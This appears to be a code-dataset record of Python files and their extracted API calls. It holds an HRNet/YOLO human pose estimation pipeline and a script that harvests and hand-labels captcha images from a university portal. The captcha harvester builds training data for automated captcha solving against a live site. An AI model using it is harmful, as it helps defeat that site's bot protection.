'numpy.sqrt', 'np.sqrt', (['(self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)'], {}), '(self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)\n', (6624, 6680), True, 'import numpy as np\n'), ((8402, 8465), 'numpy.sqrt', 'np.sqrt', (['(self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)'], {}), '(self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)\n', (8409, 8465), True, 'import numpy as np\n'), ((12054, 12082), 'os.path.basename', 'os.path.basename', (['self.fname'], {}), '(self.fname)\n', (12070, 12082), False, 'import os\n'), ((12492, 12512), 'numpy.ones_like', 'np.ones_like', (['x_axis'], {}), '(x_axis)\n', (12504, 12512), True, 'import numpy as np\n'), ((16345, 16406), 'numpy.where', 'np.where', (['((x_axis > lo_freq_bound) & (x_axis < hi_freq_bound))'], {}), '((x_axis > lo_freq_bound) & (x_axis < hi_freq_bound))\n', (16353, 16406), True, 'import numpy as np\n'), ((17053, 17075), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (17063, 17075), True, 'import matplotlib.pyplot as plt\n'), ((17092, 17157), 'matplotlib.pyplot.plot', 'plt.plot', (['([lo_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (17100, 17157), True, 'import matplotlib.pyplot as plt\n'), ((17195, 17260), 'matplotlib.pyplot.plot', 'plt.plot', (['([hi_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (17203, 17260), True, 'import matplotlib.pyplot as plt\n'), ((17463, 17541), 'matplotlib.pyplot.text', 'plt.text', (['((lo_freq_bound + hi_freq_bound) / 2)', 'check_y[check_max_index]', 'order'], {}), '((lo_freq_bound + hi_freq_bound) / 2, check_y[check_max_index], order)\n', (17471, 17541), True, 'import matplotlib.pyplot as plt\n'), ((22477, 22499), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (22487, 22499), True, 'import matplotlib.pyplot as plt\n'), ((22516, 22581), 'matplotlib.pyplot.plot', 'plt.plot', (['([lo_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (22524, 22581), True, 'import matplotlib.pyplot as plt\n'), ((22619, 22684), 'matplotlib.pyplot.plot', 'plt.plot', (['([hi_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (22627, 22684), True, 'import matplotlib.pyplot as plt\n'), ((22722, 22816), 'matplotlib.pyplot.plot', 'plt.plot', (['[lo_freq_bound, hi_freq_bound]', '([check_y[check_max_index]] * 2)', '"""b"""'], {'label': 'order'}), "([lo_freq_bound, hi_freq_bound], [check_y[check_max_index]] * 2,\n 'b', label=order)\n", (22730, 22816), True, 'import matplotlib.pyplot as plt\n'), ((22870, 22948), 'matplotlib.pyplot.text', 'plt.text', (['((lo_freq_bound + hi_freq_bound) / 2)', 'check_y[check_max_index]', 'order'], {}), '((lo_freq_bound + hi_freq_bound) / 2, check_y[check_max_index], order)\n', (22878, 22948), True, 'import matplotlib.pyplot as plt\n'), ((28816, 28844), 'os.path.basename', 'os.path.basename', (['self.fname'], {}), '(self.fname)\n', (28832, 28844), False, 'import os\n'), ((32926, 32987), 'numpy.where', 'np.where', (['((x_axis > lo_freq_bound) & (x_axis < hi_freq_bound))'], {}), '((x_axis > lo_freq_bound) & (x_axis < hi_freq_bound))\n', (32934, 32987), True, 'import numpy as np\n'), ((33634, 33656), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (33644, 33656), True, 'import matplotlib.pyplot as plt\n'), ((33673, 33738), 'matplotlib.pyplot.plot', 'plt.plot', (['([lo_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (33681, 33738), True, 'import matplotlib.pyplot as plt\n'), ((33776, 33841), 'matplotlib.pyplot.plot', 'plt.plot', (['([hi_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (33784, 33841), True, 'import matplotlib.pyplot as plt\n'), ((34044, 34122), 'matplotlib.pyplot.text', 'plt.text', (['((lo_freq_bound + hi_freq_bound) / 2)', 'check_y[check_max_index]', 'order'], {}), '((lo_freq_bound + hi_freq_bound) / 2, check_y[check_max_index], order)\n', (34052, 34122), True, 'import matplotlib.pyplot as plt\n'), ((39063, 39085), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (39073, 39085), True, 'import matplotlib.pyplot as plt\n'), ((39102, 39167), 'matplotlib.pyplot.plot', 'plt.plot', (['([lo_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (39110, 39167), True, 'import matplotlib.pyplot as plt\n'), ((39205, 39270), 'matplotlib.pyplot.plot', 'plt.plot', (['([hi_freq_bound] * 2)', '[0, check_y[check_max_index]]', '"""b"""'], {}), "([hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')\n", (39213, 39270), True, 'import matplotlib.pyplot as plt\n'), ((39308, 39402), 'matplotlib.pyplot.plot', 'plt.plot', (['[lo_freq_bound, hi_freq_bound]', '([check_y[check_max_index]] * 2)', '"""b"""'], {'label': 'order'}), "([lo_freq_bound, hi_freq_bound], [check_y[check_max_index]] * 2,\n 'b', label=order)\n", (39316, 39402), True, 'import matplotlib.pyplot as plt\n'), ((39456, 39534), 'matplotlib.pyplot.text', 'plt.text', (['((lo_freq_bound + hi_freq_bound) / 2)', 'check_y[check_max_index]', 'order'], {}), '((lo_freq_bound + hi_freq_bound) / 2, check_y[check_max_index], order)\n', (39464, 39534), True, 'import matplotlib.pyplot as plt\n'), ((45142, 45170), 'os.path.basename', 'os.path.basename', (['self.fname'], {}), '(self.fname)\n', (45158, 45170), False, 'import os\n'), ((47106, 47128), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (47116, 47128), True, 'import matplotlib.pyplot as plt\n'), ((47184, 47239), 'numpy.linspace', 'np.linspace', (['data_temp[0, 0]', 'data_temp[-1, 0]'], {'num': '(500)'}), '(data_temp[0, 0], data_temp[-1, 0], num=500)\n', (47195, 47239), True, 'import numpy as np\n'), ((48449, 48519), 'scipy.optimize.curve_fit', 'curve_fit', (['gauss', 'data_temp[:, 0]', 'data_temp[:, 1]'], {'p0': 'p0', 'maxfev': '(2000)'}), '(gauss, data_temp[:, 0], data_temp[:, 1], p0=p0, maxfev=2000)\n', (48458, 48519), False, 'from scipy.optimize import curve_fit\n'), ((51997, 52019), 'matplotlib.pyplot.figure', 'plt.figure', (['"""CCD data"""'], {}), "('CCD data')\n", (52007, 52019), True, 'import matplotlib.pyplot as plt\n'), ((52075, 52130), 'numpy.linspace', 'np.linspace', (['data_temp[0, 0]', 'data_temp[-1, 0]'], {'num': '(500)'}), '(data_temp[0, 0], data_temp[-1, 0], num=500)\n', (52086, 52130), True, 'import numpy as np\n'), ((13258, 13283), 'numpy.zeros', 'np.zeros', (['(15 - global_max)'], {}), '(15 - global_max)\n', (13266, 13283), True, 'import numpy as np\n'), ((26735, 26760), 'numpy.asarray', 'np.asarray', (['sb_freq_guess'], {}), '(sb_freq_guess)\n', (26745, 26760), True, 'import numpy as np\n'), ((26796, 26820), 'numpy.asarray', 'np.asarray', (['sb_amp_guess'], {}), '(sb_amp_guess)\n', (26806, 26820), True, 'import numpy as np\n'), ((26856, 26880), 'numpy.asarray', 'np.asarray', (['sb_error_est'], {}), '(sb_error_est)\n', (26866, 26880), True, 'import numpy as np\n'), ((29832, 29857), 'numpy.zeros', 'np.zeros', (['(15 - global_max)'], {}), '(15 - global_max)\n', (29840, 29857), True, 'import numpy as np\n'), ((43164, 43189), 'numpy.asarray', 'np.asarray', (['sb_freq_guess'], {}), '(sb_freq_guess)\n', (43174, 43189), True, 'import numpy as np\n'), ((43191, 43215), 'numpy.asarray', 'np.asarray', (['sb_amp_guess'], {}), '(sb_amp_guess)\n', (43201, 43215), True, 'import numpy as np\n'), ((43233, 43257), 'numpy.asarray', 'np.asarray', (['sb_error_est'], {}), '(sb_error_est)\n', (43243, 43257), True, 'import numpy as np\n'), ((59504, 59543), 'os.path.join', 'os.path.join', (['folder_str', 'spectra_fname'], {}), '(folder_str, spectra_fname)\n', (59516, 59543), False, 'import os\n'), ((3311, 3344), 'numpy.ones_like', 'np.ones_like', (['self.ccd_data[:, 1]'], {}), '(self.ccd_data[:, 1])\n', (3323, 3344), True, 'import numpy as np\n'), ((13421, 13448), 'numpy.zeros', 'np.zeros', (['(global_max - 1585)'], {}), '(global_max - 1585)\n', (13429, 13448), True, 'import numpy as np\n'), ((29995, 30022), 'numpy.zeros', 'np.zeros', (['(global_max - 1585)'], {}), '(global_max - 1585)\n', (30003, 30022), True, 'import numpy as np\n'), ((46933, 46962), 'numpy.array_str', 'np.array_str', (['p0'], {'precision': '(4)'}), '(p0, precision=4)\n', (46945, 46962), True, 'import numpy as np\n'), ((48044, 48062), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*p0'], {}), '(x_vals, *p0)\n', (48049, 48062), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((49573, 49605), 'numpy.array_str', 'np.array_str', (['coeff'], {'precision': '(4)'}), '(coeff, precision=4)\n', (49585, 49605), True, 'import numpy as np\n'), ((52941, 52962), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*coeff'], {}), '(x_vals, *coeff)\n', (52946, 52962), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((23246, 23264), 'numpy.arange', 'np.arange', (['no_peak'], {}), '(no_peak)\n', (23255, 23264), True, 'import numpy as np\n'), ((23266, 23288), 'numpy.arange', 'np.arange', (['(-no_peak)', '(0)'], {}), '(-no_peak, 0)\n', (23275, 23288), True, 'import numpy as np\n'), ((23376, 23394), 'numpy.arange', 'np.arange', (['no_peak'], {}), '(no_peak)\n', (23385, 23394), True, 'import numpy as np\n'), ((23396, 23418), 'numpy.arange', 'np.arange', (['(-no_peak)', '(0)'], {}), '(-no_peak, 0)\n', (23405, 23418), True, 'import numpy as np\n'), ((39832, 39850), 'numpy.arange', 'np.arange', (['no_peak'], {}), '(no_peak)\n', (39841, 39850), True, 'import numpy as np\n'), ((39852, 39874), 'numpy.arange', 'np.arange', (['(-no_peak)', '(0)'], {}), '(-no_peak, 0)\n', (39861, 39874), True, 'import numpy as np\n'), ((39962, 39980), 'numpy.arange', 'np.arange', (['no_peak'], {}), '(no_peak)\n', (39971, 39980), True, 'import numpy as np\n'), ((39982, 40004), 'numpy.arange', 'np.arange', (['(-no_peak)', '(0)'], {}), '(-no_peak, 0)\n', (39991, 40004), True, 'import numpy as np\n'), ((47357, 47375), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*p0'], {}), '(x_vals, *p0)\n', (47362, 47375), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((52248, 52269), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*coeff'], {}), '(x_vals, *coeff)\n', (52253, 52269), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((47884, 47902), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*p0'], {}), '(x_vals, *p0)\n', (47889, 47902), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((52778, 52799), 'Stele.processing.processing_hsg.helper_functions.gauss', 'gauss', (['x_vals', '*coeff'], {}), '(x_vals, *coeff)\n', (52783, 52799), False, 'from Stele.processing.processing_hsg.helper_functions import gauss\n'), ((49920, 49937), 'numpy.diag', 'np.diag', (['var_list'], {}), '(var_list)\n', (49927, 49937), True, 'import numpy as np\n'), ((50118, 50135), 'numpy.diag', 'np.diag', (['var_list'], {}), '(var_list)\n', (50125, 50135), True, 'import numpy as np\n'), ((47473, 47482), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (47480, 47482), True, 'import matplotlib.pyplot as plt\n'), ((52304, 52313), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (52311, 52313), True, 'import matplotlib.pyplot as plt\n')]
|
import requests
import os
import cv2
import shutil
def main():
mainUrl = "https://portal.aut.ac.ir/aportal/index.jsp"
img_url = 'https://portal.aut.ac.ir/aportal/PassImageServlet'
pics_src = '/home/mahdi/Desktop/pics/'
if not os.path.isdir(pics_src):
os.makedirs(pics_src)
num = len(os.listdir(pics_src))
flag = True
while flag:
print(str(num) + ' file saved')
request1 = requests.get(mainUrl, allow_redirects=True)
cookies = request1.cookies
request = requests.get(img_url, allow_redirects=True, stream=True, cookies=cookies)
print(request.status_code)
with open('/home/mahdi/Desktop/bw_image', 'wb') as out_file:
shutil.copyfileobj(request.raw, out_file)
img = cv2.imread('/home/mahdi/Desktop/bw_image')
print('write the captcha:')
name = ''
cv2.namedWindow("captcha")
while True:
cv2.imshow("captcha", img)
# print(cv2.waitKey())
k = (cv2.waitKey())
# print(k)
if k == 10:
break
elif k == 65288:
name = name[0:len(name)-1]
else:
name += chr(k)
print(name)
# cv2.destroyAllWindows()
# cv2.imshow('img', img)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# name = input()
if name == 'x':
flag = False
break
cv2.imwrite(pics_src + name + '.jpeg', img)
for i in range(1, 100):
request = requests.get(img_url, allow_redirects=True, stream=True, cookies=cookies)
with open('/home/mahdi/Desktop/bw_image', 'wb') as out_file:
shutil.copyfileobj(request.raw, out_file)
img = cv2.imread('/home/mahdi/Desktop/bw_image')
cv2.imwrite(pics_src+name+str(i)+'.jpeg', img)
num += 100
if __name__== "__main__":
main()
|
[
"os.makedirs",
"os.path.isdir",
"cv2.imwrite",
"cv2.waitKey",
"cv2.imshow",
"cv2.imread",
"requests.get",
"shutil.copyfileobj",
"os.listdir",
"cv2.namedWindow"
] |
[((245, 268), 'os.path.isdir', 'os.path.isdir', (['pics_src'], {}), '(pics_src)\n', (258, 268), False, 'import os\n'), ((278, 299), 'os.makedirs', 'os.makedirs', (['pics_src'], {}), '(pics_src)\n', (289, 299), False, 'import os\n'), ((314, 334), 'os.listdir', 'os.listdir', (['pics_src'], {}), '(pics_src)\n', (324, 334), False, 'import os\n'), ((428, 471), 'requests.get', 'requests.get', (['mainUrl'], {'allow_redirects': '(True)'}), '(mainUrl, allow_redirects=True)\n', (440, 471), False, 'import requests\n'), ((525, 598), 'requests.get', 'requests.get', (['img_url'], {'allow_redirects': '(True)', 'stream': '(True)', 'cookies': 'cookies'}), '(img_url, allow_redirects=True, stream=True, cookies=cookies)\n', (537, 598), False, 'import requests\n'), ((771, 813), 'cv2.imread', 'cv2.imread', (['"""/home/mahdi/Desktop/bw_image"""'], {}), "('/home/mahdi/Desktop/bw_image')\n", (781, 813), False, 'import cv2\n'), ((877, 903), 'cv2.namedWindow', 'cv2.namedWindow', (['"""captcha"""'], {}), "('captcha')\n", (892, 903), False, 'import cv2\n'), ((1474, 1517), 'cv2.imwrite', 'cv2.imwrite', (["(pics_src + name + '.jpeg')", 'img'], {}), "(pics_src + name + '.jpeg', img)\n", (1485, 1517), False, 'import cv2\n'), ((715, 756), 'shutil.copyfileobj', 'shutil.copyfileobj', (['request.raw', 'out_file'], {}), '(request.raw, out_file)\n', (733, 756), False, 'import shutil\n'), ((936, 962), 'cv2.imshow', 'cv2.imshow', (['"""captcha"""', 'img'], {}), "('captcha', img)\n", (946, 962), False, 'import cv2\n'), ((1015, 1028), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (1026, 1028), False, 'import cv2\n'), ((1572, 1645), 'requests.get', 'requests.get', (['img_url'], {'allow_redirects': '(True)', 'stream': '(True)', 'cookies': 'cookies'}), '(img_url, allow_redirects=True, stream=True, cookies=cookies)\n', (1584, 1645), False, 'import requests\n'), ((1795, 1837), 'cv2.imread', 'cv2.imread', (['"""/home/mahdi/Desktop/bw_image"""'], {}), "('/home/mahdi/Desktop/bw_image')\n", (1805, 1837), False, 'import cv2\n'), ((1735, 1776), 'shutil.copyfileobj', 'shutil.copyfileobj', (['request.raw', 'out_file'], {}), '(request.raw, out_file)\n', (1753, 1776), False, 'import shutil\n')]
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import os
import os.path as osp
import argparse
import time
import numpy as np
from tqdm import tqdm
import json
import torch
import torch.backends.cudnn as cudnn
import cv2
import _init_paths
from _init_paths import get_path
from utils.utilitys import plot_keypoint, PreProcess, write, load_json
from config import cfg, update_config
from utils.transforms import *
from utils.inference import get_final_preds
import models
sys.path.pop(0)
pre_dir, cur_dir, chk_root, data_root, lib_root, output_root = get_path(__file__)
cfg_dir = pre_dir + '/experiments/coco/hrnet/'
model_dir = chk_root + 'hrnet/pose_coco/'
# Loading human detector model
sys.path.insert(0, lib_root)
from detector import load_model as yolo_model
from detector import yolo_human_det as yolo_det
from track.sort import Sort
sys.path.pop(0)
def parse_args():
parser = argparse.ArgumentParser(description='Train keypoints network')
# general
parser.add_argument('--cfg', type=str, default=cfg_dir + 'w48_384x288_adam_lr1e-3.yaml',
help='experiment configure file name')
parser.add_argument('opts', nargs=argparse.REMAINDER, default=None,
help="Modify config options using the command-line")
parser.add_argument('--modelDir', type=str, default=model_dir + 'pose_hrnet_w48_384x288.pth',
help='The model directory')
parser.add_argument('--det-dim', type=int, default=416,
help='The input dimension of the detected image')
parser.add_argument('--thred-score', type=float, default=0.70,
help='The threshold of object Confidence')
parser.add_argument('-a', '--animation', action='store_true',
help='output animation')
parser.add_argument('-np', '--num-person', type=int, default=1,
help='The maximum number of estimated poses')
parser.add_argument("-v", "--video", type=str, default='camera',
help="input video file name")
args = parser.parse_args()
return args
def reset_config(args):
update_config(cfg, args)
# cudnn related setting
cudnn.benchmark = cfg.CUDNN.BENCHMARK
torch.backends.cudnn.deterministic = cfg.CUDNN.DETERMINISTIC
torch.backends.cudnn.enabled = cfg.CUDNN.ENABLED
# load model
def model_load(config):
print('Loading HRNet model ...')
# lib/models/pose_hrnet.py:get_pose_net
model = eval('models.' + config.MODEL.NAME + '.get_pose_net')(config, is_train=False)
if torch.cuda.is_available():
model = model.cuda()
state_dict = torch.load(config.OUTPUT_DIR)
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
name = k # remove module.
# print(name,'\t')
new_state_dict[name] = v
model.load_state_dict(new_state_dict)
model.eval()
print('HRNet network successfully loaded')
return model
def load_default_model():
args = parse_args()
reset_config(args)
print('Loading HRNet model ...')
# lib/models/pose_hrnet.py:get_pose_net
model = eval('models.' + cfg.MODEL.NAME + '.get_pose_net')(cfg, is_train=False)
if torch.cuda.is_available():
model = model.cuda()
state_dict = torch.load(cfg.OUTPUT_DIR)
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
name = k # remove module.
# print(name,'\t')
new_state_dict[name] = v
model.load_state_dict(new_state_dict)
model.eval()
print('HRNet network successfully loaded')
return model
def gen_img_kpts(image, human_model, pose_model, human_sort, det_dim=416, num_peroson=2):
"""
:param image: Input image matrix instead of image path
:param human_model: The YOLOv3 model
:param pose_model: The HRNet model
:param human_sort: Input initialized sort tracker
:param det_dim: The input dimension of YOLOv3. [160, 320, 416]
:param num_peroson: The number of tracked people
:return:
kpts: (M, N, 2)
scores: (M, N, 1)
bboxs_track: (x1, y1, x2, y2, ID)
human_sort: Updated human_sort
"""
args = parse_args()
reset_config(args)
thred_score = args.thred_score
bboxs, bbox_scores = yolo_det(image, human_model, reso=det_dim, confidence=thred_score)
if bboxs is None or not bboxs.any():
return None, None, None
# Using Sort to track people
# people_track: Num_bbox × [x1, y1, x2, y2, ID]
people_track = human_sort.update(bboxs)
# Track the first two people in the video and remove the ID
if people_track.shape[0] == 1:
bboxs_track = people_track[-1].reshape(1, 5)
else:
people_track_ = people_track[-num_peroson:].reshape(num_peroson, 5)
bboxs_track = people_track_[::-1]
with torch.no_grad():
# bbox is coordinate location
inputs, origin_img, center, scale = PreProcess(image, bboxs_track, cfg, num_peroson)
inputs = inputs[:, [2, 1, 0]]
if torch.cuda.is_available():
inputs = inputs.cuda()
output = pose_model(inputs)
# compute coordinate
preds, maxvals = get_final_preds(cfg, output.clone().cpu().numpy(), np.asarray(center), np.asarray(scale))
kpts = np.zeros((num_peroson, 17, 2), dtype=np.float32)
scores = np.zeros((num_peroson, 17, 1), dtype=np.float32)
for i, kpt in enumerate(preds):
kpts[i] = kpt
for i, score in enumerate(maxvals):
scores[i] = score
human_indexes = []
for i in range(len(bboxs_track)):
human_indexes.append(bboxs_track[i, -1])
return kpts, scores, human_indexes
def gen_video_kpts(video, det_dim=416, num_peroson=1, gen_output=False):
# Updating configuration
args = parse_args()
reset_config(args)
cap = cv2.VideoCapture(video)
assert cap.isOpened(), 'Cannot capture source'
# Loading detector and pose model, initialize sort for track
human_model = yolo_model(inp_dim=det_dim)
pose_model = model_load(cfg)
people_sort = Sort()
video_length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
# video_length = 1000
# collect keypoints coordinate
print('Generating 2D pose ...')
kpts_result = []
scores_result = []
for i in tqdm(range(video_length)):
ret, frame = cap.read()
if not ret:
continue
# start = time.time()
try:
bboxs, scores = yolo_det(frame, human_model, reso=det_dim, confidence=args.thred_score)
if bboxs is None or not bboxs.any():
print('No person detected!')
# print('FPS of the video is {:5.2f}'.format(1 / (time.time() - start)))
continue
# Using Sort to track people
people_track = people_sort.update(bboxs)
# Track the first two people in the video and remove the ID
if people_track.shape[0] == 1:
people_track_ = people_track[-1, :-1].reshape(1, 4)
elif people_track.shape[0] >= 2:
people_track_ = people_track[-num_peroson:, :-1].reshape(num_peroson, 4)
people_track_ = people_track_[::-1]
else:
continue
track_bboxs = []
for bbox in people_track_:
bbox = [round(i, 2) for i in list(bbox)]
track_bboxs.append(bbox)
except Exception as e:
print(e)
exit(0)
continue
with torch.no_grad():
# bbox is coordinate location
inputs, origin_img, center, scale = PreProcess(frame, track_bboxs, cfg, num_peroson)
inputs = inputs[:, [2, 1, 0]]
if torch.cuda.is_available():
inputs = inputs.cuda()
output = pose_model(inputs)
# compute coordinate
preds, maxvals = get_final_preds(cfg, output.clone().cpu().numpy(), np.asarray(center), np.asarray(scale))
if gen_output:
kpts = np.zeros((num_peroson, 17, 2), dtype=np.float32)
scores = np.zeros((num_peroson, 17), dtype=np.float32)
for i, kpt in enumerate(preds):
kpts[i] = kpt
for i, score in enumerate(maxvals):
scores[i] = score.squeeze()
kpts_result.append(kpts)
scores_result.append(scores)
else:
index_bboxs = [bbox + [i] for i, bbox in enumerate(track_bboxs)]
list(map(lambda x: write(x, frame), index_bboxs))
plot_keypoint(frame, preds, maxvals, 0.3)
# print('FPS of the video is {:5.2f}'.format(1 / (time.time() - start)))
cv2.imshow('frame', frame)
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
if gen_output:
keypoints = np.array(kpts_result)
scores = np.array(scores_result)
keypoints = keypoints.transpose(1, 0, 2, 3) # (T, M, N, 2) --> (M, T, N, 2)
scores = scores.transpose(1, 0, 2) # (T, M, N) --> (M, T, N)
return keypoints, scores
def generate_ntu_kpts_json(video_path, kpts_file):
args = parse_args()
reset_config(args)
# Loading detector and pose model, initialize sort for track
human_model = yolo_model()
pose_model = model_load(cfg)
people_sort = Sort()
with torch.no_grad():
cap = cv2.VideoCapture(video_path)
video_length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
# collect keypoints information
kpts_info = dict()
data = []
for i in tqdm(range(video_length)):
frame_info = {'frame_index': i + 1}
ret, frame = cap.read()
try:
bboxs, scores = yolo_det(frame, human_model, confidence=args.thred_score)
if bboxs is None or not bboxs.any():
print('No person detected!')
continue
# Using Sort to track people
people_track = people_sort.update(bboxs)
# Track the first two people in the video and remove the ID
if people_track.shape[0] == 1:
people_track_ = people_track[-1, :-1].reshape(1, 4)
elif people_track.shape[0] >= 2:
people_track_ = people_track[-2:, :-1].reshape(2, 4)
people_track_ = people_track_[::-1]
else:
skeleton = {'skeleton': [{'pose': [], 'score': [], 'bbox': []}]}
frame_info.update(skeleton)
data.append(frame_info)
continue
track_bboxs = []
for bbox in people_track_:
bbox = [round(i, 3) for i in list(bbox)]
track_bboxs.append(bbox)
except Exception as e:
print(e)
continue
# bbox is coordinate location
inputs, origin_img, center, scale = PreProcess(frame, bboxs, cfg, args.num_person)
inputs = inputs[:, [2, 1, 0]]
if torch.cuda.is_available():
inputs = inputs.cuda()
output = pose_model(inputs.cuda())
# compute coordinate
preds, maxvals = get_final_preds(cfg, output.clone().cpu().numpy(), np.asarray(center),
np.asarray(scale))
skeleton = []
for num, bbox in enumerate(track_bboxs):
pose = preds[num].tolist()
score = maxvals[num].tolist()
pose = round_list(pose)
score = round_list(score)
one_skeleton = {'pose': pose,
'score': score,
'bbox': bbox}
skeleton.append(one_skeleton)
frame_info.update({'skeleton': skeleton})
data.append(frame_info)
kpts_info.update({'data': data})
with open(kpts_file, 'w') as fw:
json.dump(kpts_info, fw)
print('Finishing!')
def round_list(input_list, decimals=3):
dim = len(input_list)
for i in range(dim):
for j in range(len(input_list[i])):
input_list[i][j] = round(input_list[i][j], decimals)
return input_list
|
[
"sys.path.pop",
"argparse.ArgumentParser",
"utils.utilitys.plot_keypoint",
"config.update_config",
"cv2.imshow",
"detector.load_model",
"torch.no_grad",
"detector.yolo_human_det",
"torch.load",
"json.dump",
"cv2.waitKey",
"numpy.asarray",
"torch.cuda.is_available",
"track.sort.Sort",
"utils.utilitys.write",
"_init_paths.get_path",
"numpy.zeros",
"sys.path.insert",
"utils.utilitys.PreProcess",
"cv2.VideoCapture",
"numpy.array",
"collections.OrderedDict"
] |
[((546, 561), 'sys.path.pop', 'sys.path.pop', (['(0)'], {}), '(0)\n', (558, 561), False, 'import sys\n'), ((626, 644), '_init_paths.get_path', 'get_path', (['__file__'], {}), '(__file__)\n', (634, 644), False, 'from _init_paths import get_path\n'), ((766, 794), 'sys.path.insert', 'sys.path.insert', (['(0)', 'lib_root'], {}), '(0, lib_root)\n', (781, 794), False, 'import sys\n'), ((917, 932), 'sys.path.pop', 'sys.path.pop', (['(0)'], {}), '(0)\n', (929, 932), False, 'import sys\n'), ((966, 1028), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train keypoints network"""'}), "(description='Train keypoints network')\n", (989, 1028), False, 'import argparse\n'), ((2220, 2244), 'config.update_config', 'update_config', (['cfg', 'args'], {}), '(cfg, args)\n', (2233, 2244), False, 'from config import cfg, update_config\n'), ((2651, 2676), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2674, 2676), False, 'import torch\n'), ((2725, 2754), 'torch.load', 'torch.load', (['config.OUTPUT_DIR'], {}), '(config.OUTPUT_DIR)\n', (2735, 2754), False, 'import torch\n'), ((2816, 2829), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (2827, 2829), False, 'from collections import OrderedDict\n'), ((3333, 3358), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (3356, 3358), False, 'import torch\n'), ((3407, 3433), 'torch.load', 'torch.load', (['cfg.OUTPUT_DIR'], {}), '(cfg.OUTPUT_DIR)\n', (3417, 3433), False, 'import torch\n'), ((3495, 3508), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3506, 3508), False, 'from collections import OrderedDict\n'), ((4456, 4522), 'detector.yolo_human_det', 'yolo_det', (['image', 'human_model'], {'reso': 'det_dim', 'confidence': 'thred_score'}), '(image, human_model, reso=det_dim, confidence=thred_score)\n', (4464, 4522), True, 'from detector import yolo_human_det as yolo_det\n'), ((6043, 6066), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video'], {}), '(video)\n', (6059, 6066), False, 'import cv2\n'), ((6202, 6229), 'detector.load_model', 'yolo_model', ([], {'inp_dim': 'det_dim'}), '(inp_dim=det_dim)\n', (6212, 6229), True, 'from detector import load_model as yolo_model\n'), ((6281, 6287), 'track.sort.Sort', 'Sort', ([], {}), '()\n', (6285, 6287), False, 'from track.sort import Sort\n'), ((9519, 9531), 'detector.load_model', 'yolo_model', ([], {}), '()\n', (9529, 9531), True, 'from detector import load_model as yolo_model\n'), ((9583, 9589), 'track.sort.Sort', 'Sort', ([], {}), '()\n', (9587, 9589), False, 'from track.sort import Sort\n'), ((5018, 5033), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5031, 5033), False, 'import torch\n'), ((5117, 5165), 'utils.utilitys.PreProcess', 'PreProcess', (['image', 'bboxs_track', 'cfg', 'num_peroson'], {}), '(image, bboxs_track, cfg, num_peroson)\n', (5127, 5165), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n'), ((5216, 5241), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5239, 5241), False, 'import torch\n'), ((5475, 5523), 'numpy.zeros', 'np.zeros', (['(num_peroson, 17, 2)'], {'dtype': 'np.float32'}), '((num_peroson, 17, 2), dtype=np.float32)\n', (5483, 5523), True, 'import numpy as np\n'), ((5541, 5589), 'numpy.zeros', 'np.zeros', (['(num_peroson, 17, 1)'], {'dtype': 'np.float32'}), '((num_peroson, 17, 1), dtype=np.float32)\n', (5549, 